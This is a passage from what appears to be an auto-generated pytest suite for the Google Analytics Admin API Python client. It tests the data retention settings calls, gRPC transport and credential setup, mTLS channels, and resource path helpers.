    # Establish that the response is the type that we expect.
    assert isinstance(response, resources.DataRetentionSettings)
    assert response.name == "name_value"
    assert (
        response.event_data_retention
        == resources.DataRetentionSettings.RetentionDuration.TWO_MONTHS
    )
    assert response.reset_user_data_on_new_activity is True


@pytest.mark.asyncio
async def test_update_data_retention_settings_async_from_dict():
    await test_update_data_retention_settings_async(request_type=dict)


def test_update_data_retention_settings_field_headers():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.UpdateDataRetentionSettingsRequest()
    request.data_retention_settings.name = "data_retention_settings.name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.update_data_retention_settings), "__call__"
    ) as call:
        call.return_value = resources.DataRetentionSettings()
        client.update_data_retention_settings(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert (
        "x-goog-request-params",
        "data_retention_settings.name=data_retention_settings.name/value",
    ) in kw["metadata"]


@pytest.mark.asyncio
async def test_update_data_retention_settings_field_headers_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.UpdateDataRetentionSettingsRequest()
    request.data_retention_settings.name = "data_retention_settings.name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object( type(client.transport.update_data_retention_settings), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DataRetentionSettings() ) await client.update_data_retention_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "data_retention_settings.name=data_retention_settings.name/value", ) in kw["metadata"] def test_update_data_retention_settings_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_data_retention_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DataRetentionSettings() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.update_data_retention_settings( data_retention_settings=resources.DataRetentionSettings(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].data_retention_settings == resources.DataRetentionSettings( name="name_value" ) assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) def test_update_data_retention_settings_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. 
with pytest.raises(ValueError): client.update_data_retention_settings( analytics_admin.UpdateDataRetentionSettingsRequest(), data_retention_settings=resources.DataRetentionSettings(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) @pytest.mark.asyncio async def test_update_data_retention_settings_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_data_retention_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DataRetentionSettings() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DataRetentionSettings() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.update_data_retention_settings( data_retention_settings=resources.DataRetentionSettings(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].data_retention_settings == resources.DataRetentionSettings( name="name_value" ) assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) @pytest.mark.asyncio async def test_update_data_retention_settings_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. 
with pytest.raises(ValueError): await client.update_data_retention_settings( analytics_admin.UpdateDataRetentionSettingsRequest(), data_retention_settings=resources.DataRetentionSettings(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) def test_credentials_transport_error(): # It is an error to provide credentials and a transport instance. transport = transports.AnalyticsAdminServiceGrpcTransport( credentials=ga_credentials.AnonymousCredentials(), ) with pytest.raises(ValueError): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # It is an error to provide a credentials file and a transport instance. transport = transports.AnalyticsAdminServiceGrpcTransport( credentials=ga_credentials.AnonymousCredentials(), ) with pytest.raises(ValueError): client = AnalyticsAdminServiceClient( client_options={"credentials_file": "credentials.json"}, transport=transport, ) # It is an error to provide scopes and a transport instance. transport = transports.AnalyticsAdminServiceGrpcTransport( credentials=ga_credentials.AnonymousCredentials(), ) with pytest.raises(ValueError): client = AnalyticsAdminServiceClient( client_options={"scopes": ["1", "2"]}, transport=transport, ) def test_transport_instance(): # A client may be instantiated with a custom transport instance. transport = transports.AnalyticsAdminServiceGrpcTransport( credentials=ga_credentials.AnonymousCredentials(), ) client = AnalyticsAdminServiceClient(transport=transport) assert client.transport is transport def test_transport_get_channel(): # A client may be instantiated with a custom transport instance. 
transport = transports.AnalyticsAdminServiceGrpcTransport( credentials=ga_credentials.AnonymousCredentials(), ) channel = transport.grpc_channel assert channel transport = transports.AnalyticsAdminServiceGrpcAsyncIOTransport( credentials=ga_credentials.AnonymousCredentials(), ) channel = transport.grpc_channel assert channel @pytest.mark.parametrize( "transport_class", [ transports.AnalyticsAdminServiceGrpcTransport, transports.AnalyticsAdminServiceGrpcAsyncIOTransport, ], ) def test_transport_adc(transport_class): # Test default credentials are used if not provided. with mock.patch.object(google.auth, "default") as adc: adc.return_value = (ga_credentials.AnonymousCredentials(), None) transport_class() adc.assert_called_once() def test_transport_grpc_default(): # A client should use the gRPC transport by default. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) assert isinstance(client.transport, transports.AnalyticsAdminServiceGrpcTransport,) def test_analytics_admin_service_base_transport_error(): # Passing both a credentials object and credentials_file should raise an error with pytest.raises(core_exceptions.DuplicateCredentialArgs): transport = transports.AnalyticsAdminServiceTransport( credentials=ga_credentials.AnonymousCredentials(), credentials_file="credentials.json", ) def test_analytics_admin_service_base_transport(): # Instantiate the base transport. with mock.patch( "google.analytics.admin_v1alpha.services.analytics_admin_service.transports.AnalyticsAdminServiceTransport.__init__" ) as Transport: Transport.return_value = None transport = transports.AnalyticsAdminServiceTransport( credentials=ga_credentials.AnonymousCredentials(), ) # Every method on the transport should just blindly # raise NotImplementedError. 
methods = ( "get_account", "list_accounts", "delete_account", "update_account", "provision_account_ticket", "list_account_summaries", "get_property", "list_properties", "create_property", "delete_property", "update_property", "get_user_link", "batch_get_user_links", "list_user_links", "audit_user_links", "create_user_link", "batch_create_user_links", "update_user_link", "batch_update_user_links", "delete_user_link", "batch_delete_user_links", "get_web_data_stream", "delete_web_data_stream", "update_web_data_stream", "create_web_data_stream", "list_web_data_streams", "get_ios_app_data_stream", "delete_ios_app_data_stream", "update_ios_app_data_stream", "list_ios_app_data_streams", "get_android_app_data_stream", "delete_android_app_data_stream", "update_android_app_data_stream", "list_android_app_data_streams", "get_enhanced_measurement_settings", "update_enhanced_measurement_settings", "create_firebase_link", "delete_firebase_link", "list_firebase_links", "get_global_site_tag", "create_google_ads_link", "update_google_ads_link", "delete_google_ads_link", "list_google_ads_links", "get_data_sharing_settings", "get_measurement_protocol_secret", "list_measurement_protocol_secrets", "create_measurement_protocol_secret", "delete_measurement_protocol_secret", "update_measurement_protocol_secret", "search_change_history_events", "get_google_signals_settings", "update_google_signals_settings", "create_conversion_event", "get_conversion_event", "delete_conversion_event", "list_conversion_events", "get_display_video360_advertiser_link", "list_display_video360_advertiser_links", "create_display_video360_advertiser_link", "delete_display_video360_advertiser_link", "update_display_video360_advertiser_link", "get_display_video360_advertiser_link_proposal", "list_display_video360_advertiser_link_proposals", "create_display_video360_advertiser_link_proposal", "delete_display_video360_advertiser_link_proposal", "approve_display_video360_advertiser_link_proposal", 
"cancel_display_video360_advertiser_link_proposal", "create_custom_dimension", "update_custom_dimension", "list_custom_dimensions", "archive_custom_dimension", "get_custom_dimension", "create_custom_metric", "update_custom_metric", "list_custom_metrics", "archive_custom_metric", "get_custom_metric", "get_data_retention_settings", "update_data_retention_settings", ) for method in methods: with pytest.raises(NotImplementedError): getattr(transport, method)(request=object()) with pytest.raises(NotImplementedError): transport.close() @requires_google_auth_gte_1_25_0 def test_analytics_admin_service_base_transport_with_credentials_file(): # Instantiate the base transport with a credentials file with mock.patch.object( google.auth, "load_credentials_from_file", autospec=True ) as load_creds, mock.patch( "google.analytics.admin_v1alpha.services.analytics_admin_service.transports.AnalyticsAdminServiceTransport._prep_wrapped_messages" ) as Transport: Transport.return_value = None load_creds.return_value = (ga_credentials.AnonymousCredentials(), None) transport = transports.AnalyticsAdminServiceTransport( credentials_file="credentials.json", quota_project_id="octopus", ) load_creds.assert_called_once_with( "credentials.json", scopes=None, default_scopes=( "https://www.googleapis.com/auth/analytics.edit", "https://www.googleapis.com/auth/analytics.manage.users", "https://www.googleapis.com/auth/analytics.manage.users.readonly", "https://www.googleapis.com/auth/analytics.readonly", ), quota_project_id="octopus", ) @requires_google_auth_lt_1_25_0 def test_analytics_admin_service_base_transport_with_credentials_file_old_google_auth(): # Instantiate the base transport with a credentials file with mock.patch.object( google.auth, "load_credentials_from_file", autospec=True ) as load_creds, mock.patch( "google.analytics.admin_v1alpha.services.analytics_admin_service.transports.AnalyticsAdminServiceTransport._prep_wrapped_messages" ) as Transport: Transport.return_value = None 
load_creds.return_value = (ga_credentials.AnonymousCredentials(), None) transport = transports.AnalyticsAdminServiceTransport( credentials_file="credentials.json", quota_project_id="octopus", ) load_creds.assert_called_once_with( "credentials.json", scopes=( "https://www.googleapis.com/auth/analytics.edit", "https://www.googleapis.com/auth/analytics.manage.users", "https://www.googleapis.com/auth/analytics.manage.users.readonly", "https://www.googleapis.com/auth/analytics.readonly", ), quota_project_id="octopus", ) def test_analytics_admin_service_base_transport_with_adc(): # Test the default credentials are used if credentials and credentials_file are None. with mock.patch.object(google.auth, "default", autospec=True) as adc, mock.patch( "google.analytics.admin_v1alpha.services.analytics_admin_service.transports.AnalyticsAdminServiceTransport._prep_wrapped_messages" ) as Transport: Transport.return_value = None adc.return_value = (ga_credentials.AnonymousCredentials(), None) transport = transports.AnalyticsAdminServiceTransport() adc.assert_called_once() @requires_google_auth_gte_1_25_0 def test_analytics_admin_service_auth_adc(): # If no credentials are provided, we should use ADC credentials. with mock.patch.object(google.auth, "default", autospec=True) as adc: adc.return_value = (ga_credentials.AnonymousCredentials(), None) AnalyticsAdminServiceClient() adc.assert_called_once_with( scopes=None, default_scopes=( "https://www.googleapis.com/auth/analytics.edit", "https://www.googleapis.com/auth/analytics.manage.users", "https://www.googleapis.com/auth/analytics.manage.users.readonly", "https://www.googleapis.com/auth/analytics.readonly", ), quota_project_id=None, ) @requires_google_auth_lt_1_25_0 def test_analytics_admin_service_auth_adc_old_google_auth(): # If no credentials are provided, we should use ADC credentials. 
with mock.patch.object(google.auth, "default", autospec=True) as adc: adc.return_value = (ga_credentials.AnonymousCredentials(), None) AnalyticsAdminServiceClient() adc.assert_called_once_with( scopes=( "https://www.googleapis.com/auth/analytics.edit", "https://www.googleapis.com/auth/analytics.manage.users", "https://www.googleapis.com/auth/analytics.manage.users.readonly", "https://www.googleapis.com/auth/analytics.readonly", ), quota_project_id=None, ) @pytest.mark.parametrize( "transport_class", [ transports.AnalyticsAdminServiceGrpcTransport, transports.AnalyticsAdminServiceGrpcAsyncIOTransport, ], ) @requires_google_auth_gte_1_25_0 def test_analytics_admin_service_transport_auth_adc(transport_class): # If credentials and host are not provided, the transport class should use # ADC credentials. with mock.patch.object(google.auth, "default", autospec=True) as adc: adc.return_value = (ga_credentials.AnonymousCredentials(), None) transport_class(quota_project_id="octopus", scopes=["1", "2"]) adc.assert_called_once_with( scopes=["1", "2"], default_scopes=( "https://www.googleapis.com/auth/analytics.edit", "https://www.googleapis.com/auth/analytics.manage.users", "https://www.googleapis.com/auth/analytics.manage.users.readonly", "https://www.googleapis.com/auth/analytics.readonly", ), quota_project_id="octopus", ) @pytest.mark.parametrize( "transport_class", [ transports.AnalyticsAdminServiceGrpcTransport, transports.AnalyticsAdminServiceGrpcAsyncIOTransport, ], ) @requires_google_auth_lt_1_25_0 def test_analytics_admin_service_transport_auth_adc_old_google_auth(transport_class): # If credentials and host are not provided, the transport class should use # ADC credentials. 
with mock.patch.object(google.auth, "default", autospec=True) as adc: adc.return_value = (ga_credentials.AnonymousCredentials(), None) transport_class(quota_project_id="octopus") adc.assert_called_once_with( scopes=( "https://www.googleapis.com/auth/analytics.edit", "https://www.googleapis.com/auth/analytics.manage.users", "https://www.googleapis.com/auth/analytics.manage.users.readonly", "https://www.googleapis.com/auth/analytics.readonly", ), quota_project_id="octopus", ) @pytest.mark.parametrize( "transport_class,grpc_helpers", [ (transports.AnalyticsAdminServiceGrpcTransport, grpc_helpers), (transports.AnalyticsAdminServiceGrpcAsyncIOTransport, grpc_helpers_async), ], ) def test_analytics_admin_service_transport_create_channel( transport_class, grpc_helpers ): # If credentials and host are not provided, the transport class should use # ADC credentials. with mock.patch.object( google.auth, "default", autospec=True ) as adc, mock.patch.object( grpc_helpers, "create_channel", autospec=True ) as create_channel: creds = ga_credentials.AnonymousCredentials() adc.return_value = (creds, None) transport_class(quota_project_id="octopus", scopes=["1", "2"]) create_channel.assert_called_with( "analyticsadmin.googleapis.com:443", credentials=creds, credentials_file=None, quota_project_id="octopus", default_scopes=( "https://www.googleapis.com/auth/analytics.edit", "https://www.googleapis.com/auth/analytics.manage.users", "https://www.googleapis.com/auth/analytics.manage.users.readonly", "https://www.googleapis.com/auth/analytics.readonly", ), scopes=["1", "2"], default_host="analyticsadmin.googleapis.com", ssl_credentials=None, options=[ ("grpc.max_send_message_length", -1), ("grpc.max_receive_message_length", -1), ], ) @pytest.mark.parametrize( "transport_class", [ transports.AnalyticsAdminServiceGrpcTransport, transports.AnalyticsAdminServiceGrpcAsyncIOTransport, ], ) def test_analytics_admin_service_grpc_transport_client_cert_source_for_mtls( transport_class, ): cred = 
ga_credentials.AnonymousCredentials() # Check ssl_channel_credentials is used if provided. with mock.patch.object(transport_class, "create_channel") as mock_create_channel: mock_ssl_channel_creds = mock.Mock() transport_class( host="squid.clam.whelk", credentials=cred, ssl_channel_credentials=mock_ssl_channel_creds, ) mock_create_channel.assert_called_once_with( "squid.clam.whelk:443", credentials=cred, credentials_file=None, scopes=None, ssl_credentials=mock_ssl_channel_creds, quota_project_id=None, options=[ ("grpc.max_send_message_length", -1), ("grpc.max_receive_message_length", -1), ], ) # Check if ssl_channel_credentials is not provided, then client_cert_source_for_mtls # is used. with mock.patch.object(transport_class, "create_channel", return_value=mock.Mock()): with mock.patch("grpc.ssl_channel_credentials") as mock_ssl_cred: transport_class( credentials=cred, client_cert_source_for_mtls=client_cert_source_callback, ) expected_cert, expected_key = client_cert_source_callback() mock_ssl_cred.assert_called_once_with( certificate_chain=expected_cert, private_key=expected_key ) def test_analytics_admin_service_host_no_port(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), client_options=client_options.ClientOptions( api_endpoint="analyticsadmin.googleapis.com" ), ) assert client.transport._host == "analyticsadmin.googleapis.com:443" def test_analytics_admin_service_host_with_port(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), client_options=client_options.ClientOptions( api_endpoint="analyticsadmin.googleapis.com:8000" ), ) assert client.transport._host == "analyticsadmin.googleapis.com:8000" def test_analytics_admin_service_grpc_transport_channel(): channel = grpc.secure_channel("http://localhost/", grpc.local_channel_credentials()) # Check that channel is used if provided. 
transport = transports.AnalyticsAdminServiceGrpcTransport( host="squid.clam.whelk", channel=channel, ) assert transport.grpc_channel == channel assert transport._host == "squid.clam.whelk:443" assert transport._ssl_channel_credentials == None def test_analytics_admin_service_grpc_asyncio_transport_channel(): channel = aio.secure_channel("http://localhost/", grpc.local_channel_credentials()) # Check that channel is used if provided. transport = transports.AnalyticsAdminServiceGrpcAsyncIOTransport( host="squid.clam.whelk", channel=channel, ) assert transport.grpc_channel == channel assert transport._host == "squid.clam.whelk:443" assert transport._ssl_channel_credentials == None # Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are # removed from grpc/grpc_asyncio transport constructor. @pytest.mark.parametrize( "transport_class", [ transports.AnalyticsAdminServiceGrpcTransport, transports.AnalyticsAdminServiceGrpcAsyncIOTransport, ], ) def test_analytics_admin_service_transport_channel_mtls_with_client_cert_source( transport_class, ): with mock.patch( "grpc.ssl_channel_credentials", autospec=True ) as grpc_ssl_channel_cred: with mock.patch.object( transport_class, "create_channel" ) as grpc_create_channel: mock_ssl_cred = mock.Mock() grpc_ssl_channel_cred.return_value = mock_ssl_cred mock_grpc_channel = mock.Mock() grpc_create_channel.return_value = mock_grpc_channel cred = ga_credentials.AnonymousCredentials() with pytest.warns(DeprecationWarning): with mock.patch.object(google.auth, "default") as adc: adc.return_value = (cred, None) transport = transport_class( host="squid.clam.whelk", api_mtls_endpoint="mtls.squid.clam.whelk", client_cert_source=client_cert_source_callback, ) adc.assert_called_once() grpc_ssl_channel_cred.assert_called_once_with( certificate_chain=b"cert bytes", private_key=b"key bytes" ) grpc_create_channel.assert_called_once_with( "mtls.squid.clam.whelk:443", credentials=cred, credentials_file=None, 
scopes=None, ssl_credentials=mock_ssl_cred, quota_project_id=None, options=[ ("grpc.max_send_message_length", -1), ("grpc.max_receive_message_length", -1), ], ) assert transport.grpc_channel == mock_grpc_channel assert transport._ssl_channel_credentials == mock_ssl_cred # Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are # removed from grpc/grpc_asyncio transport constructor. @pytest.mark.parametrize( "transport_class", [ transports.AnalyticsAdminServiceGrpcTransport, transports.AnalyticsAdminServiceGrpcAsyncIOTransport, ], ) def test_analytics_admin_service_transport_channel_mtls_with_adc(transport_class): mock_ssl_cred = mock.Mock() with mock.patch.multiple( "google.auth.transport.grpc.SslCredentials", __init__=mock.Mock(return_value=None), ssl_credentials=mock.PropertyMock(return_value=mock_ssl_cred), ): with mock.patch.object( transport_class, "create_channel" ) as grpc_create_channel: mock_grpc_channel = mock.Mock() grpc_create_channel.return_value = mock_grpc_channel mock_cred = mock.Mock() with pytest.warns(DeprecationWarning): transport = transport_class( host="squid.clam.whelk", credentials=mock_cred, api_mtls_endpoint="mtls.squid.clam.whelk", client_cert_source=None, ) grpc_create_channel.assert_called_once_with( "mtls.squid.clam.whelk:443", credentials=mock_cred, credentials_file=None, scopes=None, ssl_credentials=mock_ssl_cred, quota_project_id=None, options=[ ("grpc.max_send_message_length", -1), ("grpc.max_receive_message_length", -1), ], ) assert transport.grpc_channel == mock_grpc_channel def test_account_path(): account = "squid" expected = "accounts/{account}".format(account=account,) actual = AnalyticsAdminServiceClient.account_path(account) assert expected == actual def test_parse_account_path(): expected = { "account": "clam", } path = AnalyticsAdminServiceClient.account_path(**expected) # Check that the path construction is reversible. 
    actual = AnalyticsAdminServiceClient.parse_account_path(path)
    assert expected == actual


# ---------------------------------------------------------------------------
# Resource path helper tests: each *_path test checks the composed resource
# string, and each parse_*_path test checks that parsing inverts composition.
# ---------------------------------------------------------------------------


def test_account_summary_path():
    """account_summary_path must compose the expected resource string."""
    account_summary = "whelk"
    expected = "accountSummaries/{account_summary}".format(
        account_summary=account_summary,
    )
    actual = AnalyticsAdminServiceClient.account_summary_path(account_summary)
    assert expected == actual


def test_parse_account_summary_path():
    """parse_account_summary_path must invert account_summary_path."""
    expected = {
        "account_summary": "octopus",
    }
    path = AnalyticsAdminServiceClient.account_summary_path(**expected)

    # Check that the path construction is reversible.
    actual = AnalyticsAdminServiceClient.parse_account_summary_path(path)
    assert expected == actual


def test_android_app_data_stream_path():
    """android_app_data_stream_path must compose the expected resource string."""
    property = "oyster"
    android_app_data_stream = "nudibranch"
    expected = "properties/{property}/androidAppDataStreams/{android_app_data_stream}".format(
        property=property, android_app_data_stream=android_app_data_stream,
    )
    actual = AnalyticsAdminServiceClient.android_app_data_stream_path(
        property, android_app_data_stream
    )
    assert expected == actual


def test_parse_android_app_data_stream_path():
    """parse_android_app_data_stream_path must invert android_app_data_stream_path."""
    expected = {
        "property": "cuttlefish",
        "android_app_data_stream": "mussel",
    }
    path = AnalyticsAdminServiceClient.android_app_data_stream_path(**expected)

    # Check that the path construction is reversible.
    actual = AnalyticsAdminServiceClient.parse_android_app_data_stream_path(path)
    assert expected == actual


def test_conversion_event_path():
    """conversion_event_path must compose the expected resource string."""
    property = "winkle"
    conversion_event = "nautilus"
    expected = "properties/{property}/conversionEvents/{conversion_event}".format(
        property=property, conversion_event=conversion_event,
    )
    actual = AnalyticsAdminServiceClient.conversion_event_path(
        property, conversion_event
    )
    assert expected == actual


def test_parse_conversion_event_path():
    """parse_conversion_event_path must invert conversion_event_path."""
    expected = {
        "property": "scallop",
        "conversion_event": "abalone",
    }
    path = AnalyticsAdminServiceClient.conversion_event_path(**expected)

    # Check that the path construction is reversible.
    actual = AnalyticsAdminServiceClient.parse_conversion_event_path(path)
    assert expected == actual


def test_custom_dimension_path():
    """custom_dimension_path must compose the expected resource string."""
    property = "squid"
    # NOTE(review): the generated pattern has no {custom_dimension} segment;
    # this mirrors the client's path template at this API version.
    expected = "properties/{property}/customDimensions".format(property=property,)
    actual = AnalyticsAdminServiceClient.custom_dimension_path(property)
    assert expected == actual


def test_parse_custom_dimension_path():
    """parse_custom_dimension_path must invert custom_dimension_path."""
    expected = {
        "property": "clam",
    }
    path = AnalyticsAdminServiceClient.custom_dimension_path(**expected)

    # Check that the path construction is reversible.
    actual = AnalyticsAdminServiceClient.parse_custom_dimension_path(path)
    assert expected == actual


def test_custom_metric_path():
    """custom_metric_path must compose the expected resource string."""
    property = "whelk"
    expected = "properties/{property}/customMetrics".format(property=property,)
    actual = AnalyticsAdminServiceClient.custom_metric_path(property)
    assert expected == actual


def test_parse_custom_metric_path():
    """parse_custom_metric_path must invert custom_metric_path."""
    expected = {
        "property": "octopus",
    }
    path = AnalyticsAdminServiceClient.custom_metric_path(**expected)

    # Check that the path construction is reversible.
    actual = AnalyticsAdminServiceClient.parse_custom_metric_path(path)
    assert expected == actual


def test_data_retention_settings_path():
    """data_retention_settings_path must compose the expected resource string."""
    property = "oyster"
    expected = "properties/{property}/dataRetentionSettings".format(property=property,)
    actual = AnalyticsAdminServiceClient.data_retention_settings_path(property)
    assert expected == actual


def test_parse_data_retention_settings_path():
    """parse_data_retention_settings_path must invert data_retention_settings_path."""
    expected = {
        "property": "nudibranch",
    }
    path = AnalyticsAdminServiceClient.data_retention_settings_path(**expected)

    # Check that the path construction is reversible.
    actual = AnalyticsAdminServiceClient.parse_data_retention_settings_path(path)
    assert expected == actual


def test_data_sharing_settings_path():
    """data_sharing_settings_path must compose the expected resource string."""
    account = "cuttlefish"
    expected = "accounts/{account}/dataSharingSettings".format(account=account,)
    actual = AnalyticsAdminServiceClient.data_sharing_settings_path(account)
    assert expected == actual


def test_parse_data_sharing_settings_path():
    """parse_data_sharing_settings_path must invert data_sharing_settings_path."""
    expected = {
        "account": "mussel",
    }
    path = AnalyticsAdminServiceClient.data_sharing_settings_path(**expected)

    # Check that the path construction is reversible.
    actual = AnalyticsAdminServiceClient.parse_data_sharing_settings_path(path)
    assert expected == actual


def test_display_video360_advertiser_link_path():
    """display_video360_advertiser_link_path must compose the expected resource string."""
    property = "winkle"
    display_video_360_advertiser_link = "nautilus"
    expected = "properties/{property}/displayVideo360AdvertiserLinks/{display_video_360_advertiser_link}".format(
        property=property,
        display_video_360_advertiser_link=display_video_360_advertiser_link,
    )
    actual = AnalyticsAdminServiceClient.display_video360_advertiser_link_path(
        property, display_video_360_advertiser_link
    )
    assert expected == actual


def test_parse_display_video360_advertiser_link_path():
    """parse_display_video360_advertiser_link_path must invert the path helper."""
    expected = {
        "property": "scallop",
        "display_video_360_advertiser_link": "abalone",
    }
    path = AnalyticsAdminServiceClient.display_video360_advertiser_link_path(**expected)

    # Check that the path construction is reversible.
    actual = AnalyticsAdminServiceClient.parse_display_video360_advertiser_link_path(
        path
    )
    assert expected == actual


def test_display_video360_advertiser_link_proposal_path():
    """display_video360_advertiser_link_proposal_path must compose the expected string."""
    property = "squid"
    display_video_360_advertiser_link_proposal = "clam"
    expected = "properties/{property}/displayVideo360AdvertiserLinkProposals/{display_video_360_advertiser_link_proposal}".format(
        property=property,
        display_video_360_advertiser_link_proposal=display_video_360_advertiser_link_proposal,
    )
    actual = AnalyticsAdminServiceClient.display_video360_advertiser_link_proposal_path(
        property, display_video_360_advertiser_link_proposal
    )
    assert expected == actual


def test_parse_display_video360_advertiser_link_proposal_path():
    """parse_display_video360_advertiser_link_proposal_path must invert the path helper."""
    expected = {
        "property": "whelk",
        "display_video_360_advertiser_link_proposal": "octopus",
    }
    path = AnalyticsAdminServiceClient.display_video360_advertiser_link_proposal_path(
        **expected
    )

    # Check that the path construction is reversible.
    actual = AnalyticsAdminServiceClient.parse_display_video360_advertiser_link_proposal_path(
        path
    )
    assert expected == actual


def test_enhanced_measurement_settings_path():
    """enhanced_measurement_settings_path must compose the expected resource string."""
    property = "oyster"
    web_data_stream = "nudibranch"
    expected = "properties/{property}/webDataStreams/{web_data_stream}/enhancedMeasurementSettings".format(
        property=property, web_data_stream=web_data_stream,
    )
    actual = AnalyticsAdminServiceClient.enhanced_measurement_settings_path(
        property, web_data_stream
    )
    assert expected == actual


def test_parse_enhanced_measurement_settings_path():
    """parse_enhanced_measurement_settings_path must invert the path helper."""
    expected = {
        "property": "cuttlefish",
        "web_data_stream": "mussel",
    }
    path = AnalyticsAdminServiceClient.enhanced_measurement_settings_path(**expected)

    # Check that the path construction is reversible.
    actual = AnalyticsAdminServiceClient.parse_enhanced_measurement_settings_path(path)
    assert expected == actual


def test_firebase_link_path():
    """firebase_link_path must compose the expected resource string."""
    property = "winkle"
    firebase_link = "nautilus"
    expected = "properties/{property}/firebaseLinks/{firebase_link}".format(
        property=property, firebase_link=firebase_link,
    )
    actual = AnalyticsAdminServiceClient.firebase_link_path(property, firebase_link)
    assert expected == actual


def test_parse_firebase_link_path():
    """parse_firebase_link_path must invert firebase_link_path."""
    expected = {
        "property": "scallop",
        "firebase_link": "abalone",
    }
    path = AnalyticsAdminServiceClient.firebase_link_path(**expected)

    # Check that the path construction is reversible.
    actual = AnalyticsAdminServiceClient.parse_firebase_link_path(path)
    assert expected == actual


def test_global_site_tag_path():
    """global_site_tag_path must compose the expected resource string."""
    property = "squid"
    expected = "properties/{property}/globalSiteTag".format(property=property,)
    actual = AnalyticsAdminServiceClient.global_site_tag_path(property)
    assert expected == actual


def test_parse_global_site_tag_path():
    """parse_global_site_tag_path must invert global_site_tag_path."""
    expected = {
        "property": "clam",
    }
    path = AnalyticsAdminServiceClient.global_site_tag_path(**expected)

    # Check that the path construction is reversible.
    actual = AnalyticsAdminServiceClient.parse_global_site_tag_path(path)
    assert expected == actual


def test_google_ads_link_path():
    """google_ads_link_path must compose the expected resource string."""
    property = "whelk"
    google_ads_link = "octopus"
    expected = "properties/{property}/googleAdsLinks/{google_ads_link}".format(
        property=property, google_ads_link=google_ads_link,
    )
    actual = AnalyticsAdminServiceClient.google_ads_link_path(property, google_ads_link)
    assert expected == actual


def test_parse_google_ads_link_path():
    """parse_google_ads_link_path must invert google_ads_link_path."""
    expected = {
        "property": "oyster",
        "google_ads_link": "nudibranch",
    }
    path = AnalyticsAdminServiceClient.google_ads_link_path(**expected)

    # Check that the path construction is reversible.
    actual = AnalyticsAdminServiceClient.parse_google_ads_link_path(path)
    assert expected == actual


def test_google_signals_settings_path():
    """google_signals_settings_path must compose the expected resource string."""
    property = "cuttlefish"
    expected = "properties/{property}/googleSignalsSettings".format(property=property,)
    actual = AnalyticsAdminServiceClient.google_signals_settings_path(property)
    assert expected == actual


def test_parse_google_signals_settings_path():
    """parse_google_signals_settings_path must invert google_signals_settings_path."""
    expected = {
        "property": "mussel",
    }
    path = AnalyticsAdminServiceClient.google_signals_settings_path(**expected)

    # Check that the path construction is reversible.
    actual = AnalyticsAdminServiceClient.parse_google_signals_settings_path(path)
    assert expected == actual


def test_ios_app_data_stream_path():
    """ios_app_data_stream_path must compose the expected resource string."""
    property = "winkle"
    ios_app_data_stream = "nautilus"
    expected = "properties/{property}/iosAppDataStreams/{ios_app_data_stream}".format(
        property=property, ios_app_data_stream=ios_app_data_stream,
    )
    actual = AnalyticsAdminServiceClient.ios_app_data_stream_path(
        property, ios_app_data_stream
    )
    assert expected == actual


def test_parse_ios_app_data_stream_path():
    """parse_ios_app_data_stream_path must invert ios_app_data_stream_path."""
    expected = {
        "property": "scallop",
        "ios_app_data_stream": "abalone",
    }
    path = AnalyticsAdminServiceClient.ios_app_data_stream_path(**expected)

    # Check that the path construction is reversible.
    actual = AnalyticsAdminServiceClient.parse_ios_app_data_stream_path(path)
    assert expected == actual


def test_measurement_protocol_secret_path():
    """measurement_protocol_secret_path must compose the expected resource string."""
    property = "squid"
    web_data_stream = "clam"
    measurement_protocol_secret = "whelk"
